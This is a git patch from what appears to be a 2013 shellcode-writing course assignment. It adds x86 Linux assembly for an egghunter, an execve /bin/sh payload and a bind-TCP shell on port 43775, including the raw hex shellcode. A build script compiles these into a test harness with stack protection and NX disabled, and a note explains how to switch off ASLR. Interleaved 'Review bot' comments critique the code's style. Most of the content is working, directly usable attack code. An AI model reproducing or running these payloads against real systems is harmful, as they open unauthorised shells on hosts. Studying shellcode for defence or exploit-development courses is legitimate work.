From fe9bc8f679c9e5e361a9662ab704fa414fc4834a Mon Sep 17 00:00:00 2001 From: arno01 Date: Wed, 27 Mar 2013 15:06:53 +0100 Subject: [PATCH] Assignment #3 added --- exam1/execve-stack | Bin 0 -> 530 bytes exam1/execve-stack.o | Bin 0 -> 464 bytes exam1/shellcode | Bin 0 -> 4904 bytes exam1/shellcode.c | 11 ++ exam3/NOTES | 11 ++ exam3/USAGE | 33 ++++++ exam3/egg.nasm | 32 +++++ exam3/egghunter.nasm | 79 +++++++++++++ exam3/hunter.nasm | 53 +++++++++ exam3/make.sh | 136 ++++++++++++++++++++++ exam3/payload-execve-stack.nasm | 44 +++++++ exam3/payload-shell_bind_tcp_smaller.nasm | 113 ++++++++++++++++++ exam3/payload.nasm | 1 + exam3/shellcode | Bin 0 -> 5108 bytes exam3/shellcode.c | 18 +++ 15 files changed, 531 insertions(+) create mode 100755 exam1/execve-stack create mode 100644 exam1/execve-stack.o create mode 100755 exam1/shellcode create mode 100644 exam1/shellcode.c create mode 100644 exam3/NOTES create mode 100644 exam3/USAGE create mode 100644 exam3/egg.nasm create mode 100644 exam3/egghunter.nasm create mode 100644 exam3/hunter.nasm create mode 100755 exam3/make.sh create mode 100644 exam3/payload-execve-stack.nasm create mode 100644 exam3/payload-shell_bind_tcp_smaller.nasm create mode 120000 exam3/payload.nasm create mode 100755 exam3/shellcode create mode 100644 exam3/shellcode.c diff --git a/exam1/execve-stack b/exam1/execve-stack new file mode 100755 index 0000000000000000000000000000000000000000..9731f409c35df01d7669142bc93286939d46d6e4 GIT binary patch literal 530 zcmb<-^>JflWMqH=CI)5(5HF#Dg~J3$uYgLJFem`UH5gbKn85O2VW1iYAZ`J2K$sOI zC;%c5!0^BZZo^AK8F~7}85#QeNtvCGgMvFB26a9<+W?efG`xMbfkCghGPfi#2}qX| zLFfz^t0c9e1YsIsmNZZa$o*_U4Dv$)kX8X=7=SrX5GcS569m#A_bVdtL1useh-Lz_ zAVdLBpa95Z0b-DT5DhYu6UqltVDJE_&IrZ<(lGOogy2k&J3$;!$Rn#`Vfgr87$^>t z7XZpi0r@QxAnFBx@@i;&T{J#JYDH>tS*mVvNn&!gUS48xE<-$!T~xvlAD>iQ3}dIJ OB$gyH#HZ$^FaQ7yFGbA& literal 0 HcmV?d00001 
diff --git a/exam1/execve-stack.o b/exam1/execve-stack.o new file mode 100644 index 0000000000000000000000000000000000000000..0992e7ab831d6ec00309aba5db23d10409fae11c GIT binary patch literal 464 zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBXf@FdKl+6yL znUTaDfa(;H_#iVtKoE$LT~Yv)Z~%(205M2Ehz6M{3FQMRFxUW8Ck5jGX_$F1A;SY3 zxD77_W#s7>XJqK>CuMd%4hrsk7}WXbYy(h^(eU=!2AEnftyhv-QNo~CoKaj-RFaqk zWL4%uXb2xgF(wDueinw0|B+RIVnP^6Kmg?0)QZ&PvQ*vTlEma}y}ZQYT!wfcyQl=J F4ggd0E5`r; literal 0 HcmV?d00001 
diff --git a/exam1/shellcode b/exam1/shellcode new file mode 100755 index 0000000000000000000000000000000000000000..e0c5e3591ac2c9cf88b13bba33a0d09c9130ea2a GIT binary patch literal 4904 zcmb7Ie{5Sv9X~tH>a|ImrUgQil_%yvi>Tuiw_65?{A`;oYdR><4tSL%C=B5hJH&QTD{es% zZNV{cAhH4~m7~l9DWeTII1W2x3owN?woQ?Vbs=X_k;3|-O4()Ew_$@kgbEP|{nGA+ z%7UDQjq(C8g?9R&9030Sd{f$iDcW}EO(#-;`V|u%FU1ENMceO#9q>JA9ZJY)h(-Gw zVv$|3XgodYPbK`jRXMsQ$F~3A{jx6m$v#y>SZ^zYb3^-y2mgNZ$kH=8_aB1ad`pbq z_QWe=Tgm4faDL=m7{WkS=6`z68(HRy6L~rr$lRd;G<^n2@Xivv4S3}-kC%PhEH(*Y znnS~hxS4XoNyjt=hB?6D?G*pH74aLYE0ZS)adN} zlW+E9Ry;XY>l>e6z}lMn);sxpe&S`PJhvUCxwrYqqKz;1y*QuWGmDz}`qOx_PQIQV zY-X=4p<2G4o^0B#EJ{p|HoJKxD=|IWHN@wDp;uGmUye<_o>{(js5fK>Fqd{S9`_x# zuOohPPlJ4Yc1zHlC^c>L-dp3nZrow@32dNs9u=9hGm$-15< zCBJooW=U^)HJQ6q&IVkW=RAE!=VzQxh?$F@Bp>Z(R%*^%1a~6qRG()VGPhp#_*j-- zd~tr3oaJko732I8#x?2j<<_I4lfOBC9etnd^?6vd4n>#SeRZTvLCc!6tb25RaL~W$ zV~??E`g`DTPp%u;@%a|4y39&luJ2|(KXbuA3o{u$cV2!r@1DpzzQ!9<9aWRH)$3wzGuFT~x^e_-fN|%NJBJWGwiSyFBqEm4WyOaa`!2(%kF1Biw(PS8 zc;x!fq0d1Fp&x?&I`k=M#xRrX(U5SR^tx&*Jf2fnXLTr}EWw|Q-Ik5s33qE{dCT)) z2<)6fu)RgtAA}a#-j*r`6bVgax5?VI_;H1Y02!H2J5O#$ancIKT%&>!^gHFgIYcLzQb z*kkMnSrOwv*iq%Xg4jjkrQ#Wr?it)mPf2)Dw>F|0VZroD@MM`jKmz_kH({TI@Tzjg8(ok zB4H;i{FZGFCd0#)X-7~~BjF!#63GSI644#2{eO;U$(8<=}&<@kQg4e z;?Dm){k33nJ#anAa{vI>j83#M-45Y*l|1>qhQUByC%yg~QJ{G?*0BwqPm`cEuO0at zSc7bj>wmh?o{Y%?kKBV0#sGPYi?iSzN1kzltZa|*aTvnbAdhiWfehnECvusNK^Oz% zas3}hhB2xAvYhfTgfYWB<0giTfqb!FK=CN#RtR~FyJ=(?1iC$rfj9%vJjUtiLVGgq zVbi>6EC0{SV$k5sx3-i{R-tU|P-p7J0r4`jzKc@LnjCK}jC_@jD2| zOCHZhr%owW@wksqgI7Aw*G)La8PEg^^kaCRFCc0uTuYl~~XxVS>g1+b*bzhrjq9fg?W0w`d+p32(8u=b(#1m)oLme z+g8^B3q9hkJV(s9BzECevkhAJ&xQW&0M`9;;ncDRc%(2tZc!=j0hT9aXczqP?8Wmm z-z2dOy;#IAUN`j5FW$K#|Kq?vDa@Y>tNI(j#s0q!{8VB7>Hp`zIGC04^LEw z2kZjoKFvDSVxtHF^9oQe?KR?oqWWAd4sh`uG6SspSB3t~mhgWBe67&_X7?uXGhp6+ z=x?)oi?|5PD-_=o`@c|9|21HFb%MPL^Z94sD!fnDC;nTB{RZ&&^myErq7os_yIE7A z{c2!-4_UvOCxU^blXB9y;SAtn+t%A1GP^o^dT|>z&Gt3u?zSRRBw-H468+(rDUVfV 
zI6W$GWEzQCjur9mX}a?cL4z5Mj1n~obux>jhlfvSKOG0#rJH@BmU}x)jp#<_-}NHT zaMDXkUuM|h{axLyEnQ~!zI{C%y=HGqYgY$5&NHGJPA0=AOe-E)TOcp{!fZcsu;t#) zHo+sGy2^tl@AU(zv?&jktHo>nBrxxO#0*(O(G9FN4t{$PsQqQinVodnAPKu jQ(?(7E~aSjoqPR5mSc_#n2w!}KkV-x74pvvIeX&2S9f?s literal 0 HcmV?d00001
diff --git a/exam1/shellcode.c b/exam1/shellcode.c
new file mode 100644
index 0000000..58a3743
--- /dev/null
+++ b/exam1/shellcode.c
@@ -0,0 +1,11 @@
+#include
+#include
+
+unsigned char code[] = "\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
diff --git a/exam3/NOTES b/exam3/NOTES
new file mode 100644
index 0000000..088dd00
--- /dev/null
+++ b/exam3/NOTES
@@ -0,0 +1,11 @@
+NOTES
+
+ no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+ execstack: disables Executable space protection (NX).
+ Or Data Execution Prevention (DEP) on Windows,
+ or Write XOR Execute (W^X) on BSD.
+ CPU’s NX bit ("Never eXecute").
+
+ To disalbe Address Space Layout Randomization (ASLR) when running binary
+ setarch `arch` -R ./program
diff --git a/exam3/USAGE b/exam3/USAGE
new file mode 100644
index 0000000..e78563b
--- /dev/null
+++ b/exam3/USAGE
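Review bot: `main()` in exam1/shellcode.c has no return type and `strlen(code)` is printed with `%d`, which expects an int while `strlen` returns a `size_t`; the same two lines are emitted by the heredoc in exam3/make.sh and checked in as exam3/shellcode.c. Write `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));` (and the matching `%zu` in the Hunter/Payload lines of the exam3 harness). The two bare `#include` lines look like extraction damage rather than something the commit shipped, but the file should carry `<stdio.h>` and `<string.h>` explicitly. Worth a comment on the `code[]` declaration that `strlen` stops at the first zero byte, so the printed length is only meaningful when the byte string is NUL-free — which is exactly what make.sh's `*00*` checks guard.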
@@ -0,0 +1,33 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+I'm using a symlink as follows
+
+exam3$ ln -svf payload-execve-stack.nasm payload.nasm
+`payload.nasm' -> `payload-execve-stack.nasm'
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+exam3$ ./make.sh "cust.egg"
+ [I] Using custom EGG mark: cust.egg
+ [+] Compiling payload.nasm ...
+ [+] Compiling egg.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting EGG code from egg ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5108 Mar 27 15:00 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+exam3$ ./shellcode
+Hunter Length: 37
+Payload Length: 43
+sh-4.1$
+
diff --git a/exam3/egg.nasm b/exam3/egg.nasm
new file mode 100644
index 0000000..1de4fa9
--- /dev/null
+++ b/exam3/egg.nasm
@@ -0,0 +1,32 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: egg.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .text
+global _start
+
+_start:
+ ;db "Egg-Mark" ; QWORD egg marker - will be appended in shellcode.c after running 'make.sh'
+
+ ; loop counter = 8
+ xor ecx, ecx
+ mov cl, 8
+decloop:
+ dec eax
+ loop decloop
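Review bot: The commented-out marker line in egg.nasm says the 8-byte egg "will be appended in shellcode.c", but make.sh assembles payload[] as `${EGGMARK}${EGGCODE}${PAYLOADCODE}`, so the marker is prepended to this code, not appended; reword it to `; QWORD egg marker - prepended by make.sh when it builds payload[] in shellcode.c`. The `dec eax` loop carries no explanation of what it computes: hunter.nasm reaches this code via `call eax` after matching `[eax-8]`/`[eax-4]`, so on entry eax is the first byte after the marker and eight decrements leave it pointing at the marker itself — a comment such as `; step eax back over the 8-byte marker (eax = marker start)` would make that explicit. Since the execve payload that follows in this build zeroes eax immediately, the comment should also say the value is only consumed by the standalone egghunter.nasm demo (which writes those 8 bytes to stdout), so a reader knows the loop is not load-bearing here.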
diff --git a/exam3/egghunter.nasm b/exam3/egghunter.nasm
new file mode 100644
index 0000000..90b829a
--- /dev/null
+++ b/exam3/egghunter.nasm
@@ -0,0 +1,79 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: egghunter.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ jmp short EggPoint
+
+continue:
+ pop eax
+
+ ; Searching for the Egg marker
+next:
+ inc eax ; Searching backwards
+isEgg:
+ cmp dword [eax-8], egg1
+ jne next
+ cmp dword [eax-4], egg2
+ jne next
+ call eax
+
+ ; EXIT
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ int 0x80
+
+EggPoint:
+ call continue
+
+Egg:
+ db "Egg-Mark" ; QWORD egg marker
+
+ ; loop counter = 8
+ xor ecx, ecx
+ mov cl, 8
+decloop:
+ dec eax
+ loop decloop
+
+ mov ecx, eax
+ xor edx, edx
+ mov dl, 8
+ xor eax, eax
+ mov al, 4
+ xor ebx, ebx
+ mov bl, 1
+ int 0x80
+
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ int 0x80
+
+
diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm
new file mode 100644
index 0000000..c451391
--- /dev/null
+++ b/exam3/hunter.nasm
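Review bot: The comment on `inc eax` in the search loop reads `; Searching backwards`, but the loop increments eax and compares `[eax-8]`/`[eax-4]`, so it walks memory upward from the address popped at `continue`; the identical line is in hunter.nasm. Change it to `inc eax ; Searching forward, one byte at a time`. It is also worth a comment above `next:` that nothing checks whether `[eax-8]` is mapped: the standalone demo works because the `Egg:` marker sits a few bytes after `continue` in the same page, and the make.sh build works only as long as the compiler places payload[] above hunter[] in .data; with any other layout the loop would read past the end of the mapped segment and fault instead of reporting a miss. A minor style point: `section .data` holds only `equ` constants, which emit no data, so the section is empty and the two `equ` lines can move to the top of the file.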
@@ -0,0 +1,53 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: hunter.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+;
+
+section .data
+ egg1 equ "Egg-" ; DWORD Egg marker part1
+ egg2 equ "Mark" ; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+ jmp short EggPoint
+
+continue:
+ pop eax
+
+ ; Searching for the Egg marker
+next:
+ inc eax ; Searching backwards
+isEgg:
+ cmp dword [eax-8], egg1
+ jne next
+ cmp dword [eax-4], egg2
+ jne next
+ call eax
+
+ ; EXIT
+ xor eax, eax
+ mov al, 1
+ xor ebx, ebx
+ int 0x80
+
+EggPoint:
+ call continue
diff --git a/exam3/make.sh b/exam3/make.sh
new file mode 100755
index 0000000..96d7355
--- /dev/null
+++ b/exam3/make.sh
@@ -0,0 +1,136 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+ echo " [I] Argument not specified. Using default EGG mark."
+ ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+ echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+ exit 1;
+else
+ echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload egg.o egg hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling egg.nasm ..."
+nasm -f elf32 -o egg.o egg.nasm
+ld -m elf_i386 -o egg egg.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting EGG code from egg ..."
+EGGCODE=$(objdump -d ./egg |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${EGGCODE}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+ echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+ echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+ exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include
+#include
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+ printf("Hunter Length: %d\n", strlen(hunter));
+ printf("Payload Length: %d\n", strlen(payload));
+ int (*ret)() = (int(*)())hunter;
+ ret();
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload egg.o egg hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"
diff --git a/exam3/payload-execve-stack.nasm b/exam3/payload-execve-stack.nasm
new file mode 100644
index 0000000..1ab23b8
--- /dev/null
+++ b/exam3/payload-execve-stack.nasm
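Review bot: The shebang on the first line of the hunk is `#!/usr/bin/env sh`, but the script relies on bash-only syntax — the array assignments `DEFAULTEGG=(...)`/`NEWEGG=(...)`, the `${DEFAULTEGG[0]}` expansions and `[[ ... ]]` — so on a system whose sh is dash it aborts at the first array assignment; change it to `#!/usr/bin/env bash`. The length check `elif ! [[ \`expr length $ARG1\` -ge 8 && \`expr length $ARG1\` -le 8 ]]; then` is a roundabout `-eq 8` and leaves `$ARG1` unquoted, so a marker containing whitespace is word-split before it is measured; `elif [ "${#ARG1}" -ne 8 ]; then` is shorter and needs no external `expr`. The same unquoted `$ARG1`/`$EGGMARK` appears in the `echo -n ... | od` and `sed` pipelines that derive NEWEGG and EGGMARK, so those should be quoted too or the argument rejected up front if it contains anything but printable ASCII.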
@@ -0,0 +1,44 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+ ; EAX
+ xor eax, eax
+ mov al, 11 ; execve syscall
+
+ ; EBX
+ xor edx, edx
+ push edx ; NULL termination of '//bin/sh' string
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
+
+ ; ECX
+ push edx ; NULL termination of a stack
+ push ebx ; load our '//bin/sh' on a stack
+ mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+ ; EDX
+ push edx ; NULL terminator
+ mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
+ int 0x80
+
diff --git a/exam3/payload-shell_bind_tcp_smaller.nasm b/exam3/payload-shell_bind_tcp_smaller.nasm
new file mode 100644
index 0000000..7eae9b0
--- /dev/null
+++ b/exam3/payload-shell_bind_tcp_smaller.nasm
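Review bot: The comment on `mov edx, esp` (`; EDX is a PTR to a stack which has an address to NULL.`) misdescribes the value: edx points at the zero dword just pushed, which makes envp an empty NULL-terminated array, not "an address to NULL". In the ECX block, `push edx ; NULL termination of a stack` is the terminating NULL entry of argv, and the comment should say so. Suggest one summary line above `int 0x80`, e.g. `; execve(ebx = "//bin/sh", ecx = argv {ebx, NULL}, edx = envp {NULL})`, and rewording those two comments to `; argv[1] = NULL` and `; edx = envp, an empty NULL-terminated array`. The `; EBX`/`; ECX`/`; EDX` section headers would also read better as the argument they build (`; EBX = filename`, `; ECX = argv`, `; EDX = envp`).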
@@ -0,0 +1,113 @@
+; This program is free software: you can redistribute it and/or modify
+; it under the terms of the GNU General Public License as published by
+; the Free Software Foundation, either version 3 of the License, or
+; (at your option) any later version.
+;
+; This program is distributed in the hope that it will be useful,
+; but WITHOUT ANY WARRANTY; without even the implied warranty of
+; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+; GNU General Public License for more details.
+;
+; You should have received a copy of the GNU General Public License
+; along with this program. If not, see .
+;
+;
+; Filename: payload-shell_bind_tcp_smaller.nasm
+; Author: Andrey Arapov
+; 2013 March
+;
+; DESC:
+; - Binds to a port 43775
+; - Execs Shell on incoming connection
+;
+;
+; Shellcode size: 108 bytes
+; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
+;
+; Port is the last two bytes of the shellcode.
In hex \xaa\xff (0xaaff = 43775)
+;
+;
+
+global _start
+
+section .text
+
+_start:
+ xor eax, eax
+ mov al, 102 ; socketcall
+ xor ebx, ebx
+ inc ebx ; 1 = SYS_SOCKET socket()
+ push BYTE 6 ; IPPROTO_TCP || int protocol);
+ push BYTE 1 ; SOCK_STREAM || int type,
+ push BYTE 2 ; AF_INET || socket(int domain,
+ mov ecx, esp ; ECX - PTR to arguments for socket()
+ int 0x80
+ mov esi, eax ; save socket fd in ESI for later
+
+
+ jmp short call_get_port
+port_in_esp:
+ pop edi ; getting port address from ESP
+
+ push BYTE 102
+ pop eax ; socketcall
+ inc ebx ; 2 = SYS_BIND bind()
+ xor edx, edx
+ push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
+ push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
+ push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
+ mov ecx, esp ; Save PTR to sockaddr struct in ECX
+ push BYTE 16 ; socklen_t addrlen);
+ push ecx ; const struct sockaddr *addr,
+ push esi ; bind(int sockfd,
+ mov ecx, esp ; ECX = PTR to arguments for bind()
+ int 0x80
+
+
+ mov BYTE al, 102 ; socketcall
+ inc ebx
+ inc ebx ; 4 = SYS_LISTEN listen()
+ push BYTE 1 ; int backlog);
+ push esi ; listen(int sockfd,
+ mov ecx, esp ; ECX = PTR to arguments for listen()
+ int 0x80
+
+
+ mov BYTE al, 102 ; socketcall
+ inc ebx ; 5 = SYS_ACCEPT = accept()
+ push edx ; socklen_t *addrlen = 0);
+ push edx ; struct sockaddr *addr = NULL,
+ push esi ; listen(int sockfd,
+ mov ecx, esp ; ECX = PTR to arguments for accept()
+ int 0x80
+
+
+ ; dup2 to duplicate sockfd, that will attach the client to a shell
+ ; that we'll spawn below in execve syscall
+ xchg eax, ebx ; after EBX = sockfd, EAX = 5
+ push BYTE 2
+ pop ecx
+dup2_loop:
+ mov BYTE al, 63
+ int 0x80
+ dec ecx
+ jns dup2_loop
+
+
+ ; spawning as shell
+ xor eax, eax
+ push eax
+ push 0x68732f6e ; '//bin/sh' in reverse
+ push 0x69622f2f ; beginning of '//bin/sh' string is here
+ mov ebx, esp
+ push eax
+ mov edx, esp ; ESP is now
pointing to EDX
+ push ebx
+ mov ecx, esp
+ mov al, 11 ; execve
+ int 0x80
+
+call_get_port:
+ call port_in_esp
+ db 0xaa, 0xff ; BYTE (43775 in straight hex)
+
diff --git a/exam3/payload.nasm b/exam3/payload.nasm
new file mode 120000
index 0000000..5ba03e3
--- /dev/null
+++ b/exam3/payload.nasm
@@ -0,0 +1 @@
+payload-execve-stack.nasm
\ No newline at end of file
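Review bot: In the accept() block the comment on `push esi` still reads `; listen(int sockfd,`, copied from the listen() block above it; it should read `; accept(int sockfd,`. The bind() block pushes an 8-byte sockaddr (sin_addr, sin_port, sin_family) but passes `push BYTE 16 ; socklen_t addrlen);`, so the kernel copies a further 8 bytes from whatever sits above the struct on the stack (here apparently the socket() arguments pushed earlier) as sin_zero; AF_INET bind ignores sin_zero, but that reliance deserves a comment such as `; addrlen 16: sin_zero comes from the stack above, ignored for AF_INET`. The `; Shellcode size: 108 bytes` line and the embedded byte string in the header are hand-maintained copies of the assembled output that will silently drift if the source is edited; either drop them or note that make.sh regenerates the bytes from the object file. The `mov BYTE al, 102` / `mov BYTE al, 63` spelling is unusual — the `BYTE` qualifier adds nothing on an 8-bit register operand and differs from the plain `mov al, 11` used at the end, so pick one form.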
